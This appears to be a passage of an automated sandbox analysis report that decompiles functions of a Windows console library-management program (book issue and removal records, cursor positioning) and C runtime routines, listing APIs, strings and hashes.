                                                    • Part of subcall function 00B17A40: GetStdHandle.KERNEL32(000000F5), ref: 00B17A97
                                                    • Part of subcall function 00B17A40: SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17A9A
                                                    • Part of subcall function 00B17A40: GetStdHandle.KERNEL32(000000F5), ref: 00B17ACD
                                                    • Part of subcall function 00B17A40: SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17AD0
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B195DC
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B195DF
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1960A
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1960D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ConsoleCursorHandlePosition$__fread_nolock
                                                  • String ID: Press ENTER to return to main menu$Delete any more?(Y/N)$Do You Want to Remove it?(Y/N)$Enter book id to remove:$Issue.dat$No Record Found$The issued book is removed from list$cls$rb+$record.dat$wb+
                                                  • API String ID: 2024444707-2290346939
                                                  • Opcode ID: 03d36633d3cda0db3f8ef4dc2e9fc5b9c407cbadd96db6e84f9ebf604698bd5e
                                                  • Instruction ID: 305669bd97552a7070fa992b4afcb0361d94336ae09f496c0fcd35e87fa0086f
                                                  • Opcode Fuzzy Hash: 03d36633d3cda0db3f8ef4dc2e9fc5b9c407cbadd96db6e84f9ebf604698bd5e
                                                  • Instruction Fuzzy Hash: B3515772DC8290B6EA3077E0BD47F6A3A89DB15B50F0041D1F11A523F2DEA299918B77
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B03A46, Relevance: 22.8, APIs: 15, Instructions: 311COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E00B03A46(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				void* _v60;
				signed int* _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				char _v92;
				signed int _t112;
				signed int _t134;
				signed short _t137;
				signed int _t138;
				void* _t141;
				void* _t145;
				void* _t148;
				short* _t149;
				intOrPtr _t150;
				void* _t151;
				signed int _t154;
				intOrPtr* _t155;
				signed char _t172;
				short* _t177;
				signed char _t180;
				signed int _t181;
				void* _t183;
				signed int _t185;
				signed int* _t187;
				short* _t189;
				void* _t197;
				signed int _t198;
				signed int _t205;
				signed char* _t206;
				signed int* _t209;
				signed char* _t210;
				signed int _t211;
				intOrPtr _t214;
				void* _t215;
				signed int* _t225;
				intOrPtr* _t227;
				signed int* _t228;
				intOrPtr* _t232;
				intOrPtr _t233;
				signed int _t234;
				void* _t235;
				void* _t236;

				_t112 =  *0xb26018; // 0xb47fd95f
				_v8 = _t112 ^ _t234;
				_t227 = _a4;
				_t185 = 0;
				_v76 = _t227;
				_v32 = 0;
				_t190 =  *((intOrPtr*)(_t227 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v60 = 0;
				_v92 = _t227;
				_v88 = 0;
				if( *((intOrPtr*)(_t227 + 0xa8)) == 0) {
					__eflags =  *(_t227 + 0x8c);
					if( *(_t227 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t227 + 0x8c) = _t185;
					__eflags = 0;
					 *(_t227 + 0x90) = _t185;
					 *_t227 = 0xb1e6b8;
					 *((intOrPtr*)(_t227 + 0x94)) = 0xb1e938;
					 *((intOrPtr*)(_t227 + 0x98)) = 0xb1eab8;
					 *((intOrPtr*)(_t227 + 4)) = 1;
					L41:
					return L00AD1DCD(_v8 ^ _t234);
				}
				_t117 = _t227 + 8;
				_v44 = 0;
				if( *(_t227 + 8) != 0) {
					L3:
					_v44 = E00AF4F03(_t190, 1, 4);
					L00AF4D62(_t185);
					_v32 = E00AF4F03(_t190, 0x180, 2);
					L00AF4D62(_t185);
					_v36 = E00AF4F03(_t190, 0x180, 1);
					L00AF4D62(_t185);
					_v40 = E00AF4F03(_t190, 0x180, 1);
					L00AF4D62(_t185);
					_t214 = E00AF4F03(_t190, 0x101, 1);
					_v60 = _t214;
					L00AF4D62(_t185);
					_t236 = _t235 + 0x3c;
					if(_v44 == _t185 || _v32 == _t185 || _t214 == 0 || _v36 == _t185 || _v40 == _t185) {
						L36:
						L00AF4D62(_v44);
						L00AF4D62(_v32);
						L00AF4D62(_v36);
						L00AF4D62(_v40);
						_t185 = 1;
						__eflags = 1;
						goto L37;
					} else {
						_t134 = _t185;
						do {
							 *(_t134 + _t214) = _t134;
							_t134 = _t134 + 1;
						} while (_t134 < 0x100);
						if(GetCPInfo( *(_t227 + 8),  &_v28) == 0) {
							goto L36;
						}
						_t137 = _v28;
						if(_t137 > 5) {
							goto L36;
						}
						_t138 = _t137 & 0x0000ffff;
						_v56 = _t138;
						if(_t138 <= 1) {
							L19:
							_t34 = _t214 + 1; // 0x1
							_t141 = E00B09613(_t214, _t227, _t257, _t185,  *((intOrPtr*)(_t227 + 0xa8)), 0x100, _t34, 0xff, _v36 + 0x81, 0xff,  *(_t227 + 8), _t185);
							_t236 = _t236 + 0x24;
							_t258 = _t141;
							if(_t141 == 0) {
								goto L36;
							}
							_t39 = _t214 + 1; // 0x1
							_t145 = E00B09613(_t214, _t227, _t258, _t185,  *((intOrPtr*)(_t227 + 0xa8)), 0x200, _t39, 0xff, _v40 + 0x81, 0xff,  *(_t227 + 8), _t185);
							_t236 = _t236 + 0x24;
							_t259 = _t145;
							if(_t145 == 0) {
								goto L36;
							}
							_v80 = _v32 + 0x100;
							_t148 = L00B04B10(_t185, 0xff, _t214, _t227, _t259, _t185, 1, _t214, 0x100, _v32 + 0x100,  *(_t227 + 8), _t185);
							_t236 = _t236 + 0x1c;
							if(_t148 == 0) {
								goto L36;
							}
							_t215 = _v32;
							_t149 = _t215 + 0xfe;
							 *_t149 = 0;
							_t197 = _v40;
							_v84 = _t149;
							_t150 = _v36;
							_t228 = _t197 + 0x80;
							_v52 = _t228;
							 *(_t150 + 0x7f) = _t185;
							_t209 = _t150 + 0x80;
							 *(_t197 + 0x7f) = _t185;
							 *_t209 = _t185;
							_v48 = _t209;
							 *_t228 = _t185;
							if(_v56 <= 1) {
								L32:
								_t198 = 0x3f;
								_t151 = memcpy(_t215, _t215 + 0x200, _t198 << 2);
								_push(0x1f);
								_push(0x1f);
								asm("movsw");
								memcpy(_t151, _t151 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t154 = memcpy(_v40, _v40 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t232 = _v76;
								if( *((intOrPtr*)(_t232 + 0x8c)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t154 | 0xffffffff) == 0) {
										L00AF4D62( *((intOrPtr*)(_t232 + 0x90)) - 0xfe);
										L00AF4D62( *((intOrPtr*)(_t232 + 0x94)) - 0x80);
										L00AF4D62( *((intOrPtr*)(_t232 + 0x98)) - 0x80);
										L00AF4D62( *((intOrPtr*)(_t232 + 0x8c)));
									}
								}
								_t155 = _v44;
								 *_t155 = 1;
								 *((intOrPtr*)(_t232 + 0x8c)) = _t155;
								 *_t232 = _v80;
								 *((intOrPtr*)(_t232 + 0x90)) = _v84;
								 *((intOrPtr*)(_t232 + 0x94)) = _v48;
								 *((intOrPtr*)(_t232 + 0x98)) = _v52;
								 *(_t232 + 4) = _v56;
								L37:
								L00AF4D62(_v60);
								goto L41;
							}
							_t210 =  &_v22;
							if(_v22 == _t185) {
								goto L32;
							}
							_t187 = _v48;
							while(1) {
								_t172 = _t210[1];
								if(_t172 == 0) {
									break;
								}
								_t205 =  *_t210 & 0x000000ff;
								if(_t205 > (_t172 & 0x000000ff)) {
									L30:
									_t210 =  &(_t210[2]);
									if( *_t210 != 0) {
										continue;
									}
									break;
								}
								_v64 = _t228 + _t205;
								_t225 = _v64;
								_t177 = _t215 + 0x100 + _t205 * 2;
								_v72 = _t187 - _t228;
								_t189 = _t177;
								_t233 = _v72;
								_v68 = _t177;
								do {
									 *_t189 = 0x8000;
									_t189 = _t189 + 2;
									 *(_t233 + _t225) = _t205;
									 *_t225 = _t205;
									_t205 = _t205 + 1;
									_t225 =  &(_t225[0]);
								} while (_t205 <= (_t210[1] & 0x000000ff));
								_t215 = _v32;
								_t228 = _v52;
								_t187 = _v48;
								goto L30;
							}
							_t185 = 0;
							goto L32;
						}
						_t206 =  &_v22;
						if(_v22 == _t185) {
							goto L19;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t180 = _t206[1];
							if(_t180 == 0) {
								goto L19;
							}
							_t211 =  *_t206 & 0x000000ff;
							_t181 = _t180 & 0x000000ff;
							while(_t211 <= _t181) {
								 *((char*)(_t211 + _t214)) = 0x20;
								_t211 = _t211 + 1;
								__eflags = _t211;
								_t181 = _t206[1] & 0x000000ff;
							}
							_t206 =  &(_t206[2]);
							_t257 =  *_t206 - _t185;
							if( *_t206 != _t185) {
								continue;
							}
							goto L19;
						}
						goto L19;
					}
				}
				_t183 = E00B0F5EC(__edx,  &_v92, 0, _t190, 0x1004, _t117);
				_t236 = _t235 + 0x14;
				if(_t183 != 0) {
					goto L36;
				}
				goto L3;
			}



























































                                                  0x00b03a4e
                                                  0x00b03a55
                                                  0x00b03a5a
                                                  0x00b03a5d
                                                  0x00b03a60
                                                  0x00b03a63
                                                  0x00b03a66
                                                  0x00b03a6c
                                                  0x00b03a6f
                                                  0x00b03a72
                                                  0x00b03a75
                                                  0x00b03a78
                                                  0x00b03a7d
                                                  0x00b03dc8
                                                  0x00b03dca
                                                  0x00b03dcc
                                                  0x00b03dcc
                                                  0x00b03dcf
                                                  0x00b03dd5
                                                  0x00b03dd7
                                                  0x00b03ddd
                                                  0x00b03de3
                                                  0x00b03ded
                                                  0x00b03df7
                                                  0x00b03dfe
                                                  0x00b03e0e
                                                  0x00b03e0e
                                                  0x00b03a83
                                                  0x00b03a86
                                                  0x00b03a8b
                                                  0x00b03aa9
                                                  0x00b03ab3
                                                  0x00b03ab6
                                                  0x00b03ac9
                                                  0x00b03acc
                                                  0x00b03ada
                                                  0x00b03add
                                                  0x00b03aeb
                                                  0x00b03aee
                                                  0x00b03aff
                                                  0x00b03b02
                                                  0x00b03b05
                                                  0x00b03b0a
                                                  0x00b03b10
                                                  0x00b03d8f
                                                  0x00b03d92
                                                  0x00b03d9a
                                                  0x00b03da2
                                                  0x00b03daa
                                                  0x00b03db4
                                                  0x00b03db4
                                                  0x00000000
                                                  0x00b03b39
                                                  0x00b03b39
                                                  0x00b03b3b
                                                  0x00b03b3b
                                                  0x00b03b3e
                                                  0x00b03b3f
                                                  0x00b03b55
                                                  0x00000000
                                                  0x00000000
                                                  0x00b03b5b
                                                  0x00b03b61
                                                  0x00000000
                                                  0x00000000
                                                  0x00b03b67
                                                  0x00b03b6a
                                                  0x00b03b70
                                                  0x00b03b9d
                                                  0x00b03ba0
                                                  0x00b03bc1
                                                  0x00b03bc6
                                                  0x00b03bc9
                                                  0x00b03bcb
                                                  0x00000000
                                                  0x00000000
                                                  0x00b03be5
                                                  0x00b03bf5
                                                  0x00b03bfa
                                                  0x00b03bfd
                                                  0x00b03bff
                                                  0x00000000
                                                  0x00000000
                                                  0x00b03c1b
                                                  0x00b03c1e
                                                  0x00b03c23
                                                  0x00b03c28
                                                  0x00000000
                                                  0x00000000
                                                  0x00b03c2e
                                                  0x00b03c37
                                                  0x00b03c3d
                                                  0x00b03c40
                                                  0x00b03c43
                                                  0x00b03c46
                                                  0x00b03c49
                                                  0x00b03c4f
                                                  0x00b03c52
                                                  0x00b03c55
                                                  0x00b03c5b
                                                  0x00b03c5e
                                                  0x00b03c60
                                                  0x00b03c63
                                                  0x00b03c65
                                                  0x00b03cd2
                                                  0x00b03cda
                                                  0x00b03cdb
                                                  0x00b03cdd
                                                  0x00b03ce0
                                                  0x00b03ce2
                                                  0x00b03cec
                                                  0x00b03cf2
                                                  0x00b03cf4
                                                  0x00b03cfd
                                                  0x00b03cff
                                                  0x00b03d01
                                                  0x00b03d02
                                                  0x00b03d0d
                                                  0x00b03d12
                                                  0x00b03d16
                                                  0x00b03d24
                                                  0x00b03d37
                                                  0x00b03d45
                                                  0x00b03d50
                                                  0x00b03d55
                                                  0x00b03d16
                                                  0x00b03d58
                                                  0x00b03d5b
                                                  0x00b03d61
                                                  0x00b03d6a
                                                  0x00b03d6f
                                                  0x00b03d78
                                                  0x00b03d81
                                                  0x00b03d8a
                                                  0x00b03db5
                                                  0x00b03db8
                                                  0x00000000
                                                  0x00b03dbe
                                                  0x00b03c67
                                                  0x00b03c6d
                                                  0x00000000
                                                  0x00000000
                                                  0x00b03c6f
                                                  0x00b03c72
                                                  0x00b03c72
                                                  0x00b03c77
                                                  0x00000000
                                                  0x00000000
                                                  0x00b03c79
                                                  0x00b03c81
                                                  0x00b03cc5
                                                  0x00b03cc5
                                                  0x00b03ccb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b03ccb
                                                  0x00b03c88
                                                  0x00b03c91
                                                  0x00b03c94
                                                  0x00b03c97
                                                  0x00b03c9a
                                                  0x00b03c9c
                                                  0x00b03c9f
                                                  0x00b03ca2
                                                  0x00b03ca7
                                                  0x00b03caa
                                                  0x00b03cad
                                                  0x00b03cb0
                                                  0x00b03cb2
                                                  0x00b03cb7
                                                  0x00b03cb8
                                                  0x00b03cbc
                                                  0x00b03cbf
                                                  0x00b03cc2
                                                  0x00000000
                                                  0x00b03cc2
                                                  0x00b03cd0
                                                  0x00000000
                                                  0x00b03cd0
                                                  0x00b03b72
                                                  0x00b03b78
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b03b7a
                                                  0x00b03b7a
                                                  0x00b03b7a
                                                  0x00b03b7f
                                                  0x00000000
                                                  0x00000000
                                                  0x00b03b81
                                                  0x00b03b84
                                                  0x00b03b92
                                                  0x00b03b89
                                                  0x00b03b8d
                                                  0x00b03b8d
                                                  0x00b03b8e
                                                  0x00b03b8e
                                                  0x00b03b96
                                                  0x00b03b99
                                                  0x00b03b9b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b03b9b
                                                  0x00000000
                                                  0x00b03b7a
                                                  0x00b03b10
                                                  0x00b03a99
                                                  0x00b03a9e
                                                  0x00b03aa3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • _free.LIBCMT ref: 00B03AB6
                                                  • _free.LIBCMT ref: 00B03ACC
                                                  • _free.LIBCMT ref: 00B03ADD
                                                  • _free.LIBCMT ref: 00B03AEE
                                                  • _free.LIBCMT ref: 00B03B05
                                                  • GetCPInfo.KERNEL32(?,?), ref: 00B03B4D
                                                    • Part of subcall function 00B0F5EC: _free.LIBCMT ref: 00B0F657
                                                  • _free.LIBCMT ref: 00B03D24
                                                  • _free.LIBCMT ref: 00B03D37
                                                  • _free.LIBCMT ref: 00B03D45
                                                  • _free.LIBCMT ref: 00B03D50
                                                  • _free.LIBCMT ref: 00B03D92
                                                  • _free.LIBCMT ref: 00B03D9A
                                                  • _free.LIBCMT ref: 00B03DA2
                                                  • _free.LIBCMT ref: 00B03DAA
                                                  • _free.LIBCMT ref: 00B03DB8
                                                    • Part of subcall function 00B04B10: MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,00B027F4,00000000,00000000,00000001,00000020,00000100,?,5EFC4D8B), ref: 00B04B58
                                                    • Part of subcall function 00B04B10: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?), ref: 00B04BCD
                                                    • Part of subcall function 00B04B10: GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00B04BDF
                                                    • Part of subcall function 00B04B10: __freea.LIBCMT ref: 00B04BE8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: _free$ByteCharMultiWide$InfoStringType__freea
                                                  • String ID:
                                                  • API String ID: 607174680-0
                                                  • Opcode ID: cb1329a35e1bafde06a3fc047f79ff489eeac4a7c45b7a31965b8b201dd33607
                                                  • Instruction ID: 7decbde11547f21c54bc8275ae16357db5535ef8ecb276ca7bbf607a8d30f491
                                                  • Opcode Fuzzy Hash: cb1329a35e1bafde06a3fc047f79ff489eeac4a7c45b7a31965b8b201dd33607
                                                  • Instruction Fuzzy Hash: EEC1BF709002099FDB21DFA8C885BFEBBF9FF48700F1444ADF599A7292D775A9418B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AFEBBC, Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 257COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 63%
                                                  			E00AFEBBC(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, char* _a8, signed int _a12, intOrPtr _a16) {
				void* _v0;
				signed int _v8;
				void* _v12;
				void* _v16;
				void* _v17;
				void* _v18;
				void* _v20;
				void* _v22;
				void* _v24;
				void* _v25;
				void* _v28;
				void* _v32;
				void* _v34;
				intOrPtr _v36;
				signed int _v40;
				signed int* _v44;
				signed int _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				void* _v72;
				void* _v88;
				void* _v124;
				void* _v128;
				void* _v156;
				void* _v160;
				void* _v164;
				signed int _t90;
				char* _t96;
				signed int* _t97;
				signed int* _t99;
				char* _t190;
				signed int _t197;
				intOrPtr _t270;
				void* _t272;
				signed int _t281;
				signed int _t283;
				signed int _t288;
				void* _t291;
				void* _t292;

				_t90 =  *0xb26018; // 0xb47fd95f
				_v8 = _t90 ^ _t288;
				_push(__ebx);
				_t190 = _a8;
				_push(__esi);
				_t281 = _a12;
				_v40 = _t281;
				_push(__edi);
				_t270 = _a16;
				_v36 = _t270;
				if(_t190 != 0) {
					if( *_t190 == 0 || _t281 == 0) {
						goto L1;
					} else {
						_t96 =  *_t281;
						if(_t96 == 0 ||  *_t96 == 0) {
							goto L1;
						} else {
							_t97 = E00AF69E3();
							_push(_t270);
							_push(_t281);
							 *_t97 =  *_t97 & 0x00000000;
							_v44 = _t97;
							_v48 =  *_t97;
							_t272 = L00AFEB59(_t190, _t270, _t281, _a4, _t190);
							_t283 = _t281 | 0xffffffff;
							_t292 = _t291 + 0x10;
							if(_t272 != _t283 ||  *((intOrPtr*)(E00AF69E3())) == 2 && E00B17780(_t190, 0x5c) == 0 && E00B17780(_t190, 0x2f) == 0 &&  *((char*)(_t190 + 1)) != 0x3a) {
								L48:
								_t99 = _v44;
								if( *_t99 == 0) {
									_t197 = _v48;
									if(_t197 != 0) {
										 *_t99 = _t197;
									}
								}
								goto L52;
							} else {
								goto L48;
							}
						}
					}
				} else {
					L1:
					 *((intOrPtr*)(E00AF69E3())) = 0x16;
					E00AF68BC();
					L52:
					return L00AD1DCD(_v8 ^ _t288);
				}
			}













































                                                  0x00afebc4
                                                  0x00afebcb
                                                  0x00afebce
                                                  0x00afebcf
                                                  0x00afebd2
                                                  0x00afebd3
                                                  0x00afebd6
                                                  0x00afebd9
                                                  0x00afebda
                                                  0x00afebdd
                                                  0x00afebe2
                                                  0x00afebff
                                                  0x00000000
                                                  0x00afec05
                                                  0x00afec05
                                                  0x00afec09
                                                  0x00000000
                                                  0x00afec10
                                                  0x00afec10
                                                  0x00afec15
                                                  0x00afec16
                                                  0x00afec1d
                                                  0x00afec20
                                                  0x00afec23
                                                  0x00afec2b
                                                  0x00afec2d
                                                  0x00afec30
                                                  0x00afec35
                                                  0x00afee2a
                                                  0x00afee2a
                                                  0x00afee30
                                                  0x00afee32
                                                  0x00afee37
                                                  0x00afee39
                                                  0x00afee39
                                                  0x00afee37
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00afec35
                                                  0x00afec09
                                                  0x00afebe4
                                                  0x00afebe4
                                                  0x00afebe9
                                                  0x00afebef
                                                  0x00afee3d
                                                  0x00afee4d
                                                  0x00afee4d

                                                  APIs
                                                  • ___from_strstr_to_strchr.LIBCMT ref: 00AFEC48
                                                  • ___from_strstr_to_strchr.LIBCMT ref: 00AFEC56
                                                    • Part of subcall function 00AF68E9: IsProcessorFeaturePresent.KERNEL32(00000017,00AF68BB,?,?,?,?,?,?,?,?,00AF68C8,00000000,00000000,00000000,00000000,00000000), ref: 00AF68EB
                                                    • Part of subcall function 00AF68E9: GetCurrentProcess.KERNEL32(C0000417), ref: 00AF690E
                                                    • Part of subcall function 00AF68E9: TerminateProcess.KERNEL32(00000000), ref: 00AF6915
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Process___from_strstr_to_strchr$CurrentFeaturePresentProcessorTerminate
                                                  • String ID: PATH$\
                                                  • API String ID: 2025418227-1896636505
                                                  • Opcode ID: 02625dac792371b21abbdcfbd6b2612f01e9bccc94bbdf5ef28cf86a26280e93
                                                  • Instruction ID: 37202443ecdce80739d4d1e163031662cea40572d7e98d40bd2a12f99fa95a6f
                                                  • Opcode Fuzzy Hash: 02625dac792371b21abbdcfbd6b2612f01e9bccc94bbdf5ef28cf86a26280e93
                                                  • Instruction Fuzzy Hash: 85713631904209AFEF36DBE4DC42BFE7BA59F45320F240199F650AB1E2DB758D81C6A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B19252, Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 57%
                                                  			E00B19252(intOrPtr* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				void* _t4;
				void* _t10;
				void* _t14;
				void* _t17;
				void* _t23;
				intOrPtr _t26;
				void* _t27;
				void* _t29;
				intOrPtr* _t34;
				void* _t36;
				void* _t38;
				intOrPtr* _t40;
				void* _t42;
				void* _t44;
				void* _t46;
				void* _t47;
				void* _t50;

				_t40 = __esi;
				_t38 = __edi;
				_t37 = __edx;
				_t36 = __ecx;
				_t34 = __ebx;
				_push("cls");
				E00AE3965(__ebx, __edx, __edi, __esi);
				0xb27e6c->X = 0x6000a;
				_push(0xb27e6c->X);
				_push(0xfffffff5);
				_t4 =  *__ebx();
				 *__esi();
				E00AD1080(_t36, "Enter Book ID:", _t4);
				_t46 = _t44 + 8;
				do {
					E00AD10F0(_t36, 0xb22be0, _t42 - 8);
					 *0xb27f2c = L00AD9D57("Issue.dat", "rb");
					_t10 = E00AF1525(0xb27ec0, 0x6c, 1, _t9);
					_t47 = _t46 + 0x20;
					if(_t10 == 1) {
						do {
							_t26 =  *0xb27ec0; // 0x0
							_t55 = _t26 -  *((intOrPtr*)(_t42 - 8));
							if(_t26 ==  *((intOrPtr*)(_t42 - 8))) {
								E00B17A40(_t37);
								0xb27e6c->X = 0xc000a;
								_t29 =  *_t34(0xfffffff5, 0xb27e6c->X);
								 *_t40();
								E00AD1080(_t36, "Press any key.......", _t29);
								_t47 = _t47 + 4;
								E00AF4817(_t37, _t40, _t55);
								E00B17A40(_t37);
								_t38 = 1;
							}
							_t27 = E00AF1525(0xb27ec0, 0x6c, 1,  *0xb27f2c);
							_t47 = _t47 + 0x10;
							_t56 = _t27 - 1;
						} while (_t27 == 1);
					}
					E00ADA436(_t36, _t37, L00AD9E7D(0));
					_push( *0xb27f2c);
					E00ADA516(_t36, _t37, _t56);
					_t50 = _t47 + 0xc;
					_t57 = _t38;
					if(_t38 == 0) {
						0xb27e6c->X = 0x8000a;
						_t23 =  *_t34(0xfffffff5, 0xb27e6c->X);
						 *_t40();
						E00AD1080(_t36, "No Record Found", _t23);
						_t50 = _t50 + 4;
					}
					0xb27e6c->X = 0xd000a;
					_t14 =  *_t34(0xfffffff5, 0xb27e6c->X);
					 *_t40();
					E00AD1080(_t36, "Try Another Search?(Y/N)", _t14);
					_t46 = _t50 + 4;
					_t17 = E00AF4817(_t37, _t40, _t57);
					_t58 = _t17 - 0x79;
				} while (_t17 == 0x79);
				0xb27e6c->X = 0x1e0001;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0xb27e6c);
				_push(" Press ENTER to return to main menu");
				E00AD1080(_t36);
				do {
				} while (E00AF4817(_t37, _t40, _t58) != 0xd);
				return E00B1A4D0(_t34, _t36, _t37, _t38, _t40);
			}




















                                                  0x00b19252
                                                  0x00b19252
                                                  0x00b19252
                                                  0x00b19252
                                                  0x00b19252
                                                  0x00b19252
                                                  0x00b19257
                                                  0x00b1925f
                                                  0x00b19269
                                                  0x00b1926f
                                                  0x00b19271
                                                  0x00b19274
                                                  0x00b1927b
                                                  0x00b19280
                                                  0x00b19283
                                                  0x00b1928c
                                                  0x00b192aa
                                                  0x00b192af
                                                  0x00b192b4
                                                  0x00b192ba
                                                  0x00b192c0
                                                  0x00b192c0
                                                  0x00b192c5
                                                  0x00b192c8
                                                  0x00b192ca
                                                  0x00b192cf
                                                  0x00b192e1
                                                  0x00b192e4
                                                  0x00b192eb
                                                  0x00b192f0
                                                  0x00b192f3
                                                  0x00b192f8
                                                  0x00b192fd
                                                  0x00b192fd
                                                  0x00b19311
                                                  0x00b19316
                                                  0x00b19319
                                                  0x00b19319
                                                  0x00b192c0
                                                  0x00b19329
                                                  0x00b19331
                                                  0x00b19337
                                                  0x00b1933c
                                                  0x00b1933f
                                                  0x00b19341
                                                  0x00b19343
                                                  0x00b19355
                                                  0x00b19358
                                                  0x00b1935f
                                                  0x00b19364
                                                  0x00b19364
                                                  0x00b19367
                                                  0x00b19379
                                                  0x00b1937c
                                                  0x00b19383
                                                  0x00b19388
                                                  0x00b1938b
                                                  0x00b19390
                                                  0x00b19390
                                                  0x00b195f8
                                                  0x00b1960d
                                                  0x00b1960f
                                                  0x00b19614
                                                  0x00b19620
                                                  0x00b19625
                                                  0x00b19635

                                                  APIs
                                                  • __fread_nolock.LIBCMT ref: 00B192AF
                                                  • __fread_nolock.LIBCMT ref: 00B19311
                                                    • Part of subcall function 00B17A40: GetStdHandle.KERNEL32(000000F5), ref: 00B17A68
                                                    • Part of subcall function 00B17A40: SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17A71
                                                    • Part of subcall function 00B17A40: GetStdHandle.KERNEL32(000000F5), ref: 00B17A97
                                                    • Part of subcall function 00B17A40: SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17A9A
                                                    • Part of subcall function 00B17A40: GetStdHandle.KERNEL32(000000F5), ref: 00B17ACD
                                                    • Part of subcall function 00B17A40: SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B17AD0
                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00B1960A
                                                  • SetConsoleCursorPosition.KERNEL32(00000000), ref: 00B1960D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ConsoleCursorHandlePosition$__fread_nolock
                                                  • String ID: Press ENTER to return to main menu$Enter Book ID:$Issue.dat$No Record Found$Press any key.......$Try Another Search?(Y/N)$cls
                                                  • API String ID: 2024444707-225778198
                                                  • Opcode ID: 7896f87af7c9d2230f11537cf7fa58e393baf39b67567fce1571be6f89f66e9c
                                                  • Instruction ID: 0b153d82976558ece10cb9839be44b5890e6e96f41972190e2c143441b26e358
                                                  • Opcode Fuzzy Hash: 7896f87af7c9d2230f11537cf7fa58e393baf39b67567fce1571be6f89f66e9c
                                                  • Instruction Fuzzy Hash: 1E318BB2CC829076DA3077E0BC47EAA3999DB14764F1041D1F11A523F2DEB299908B77
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B17A40, Relevance: 17.5, APIs: 6, Strings: 4, Instructions: 46COMMON
                                                  Download Yara Rule
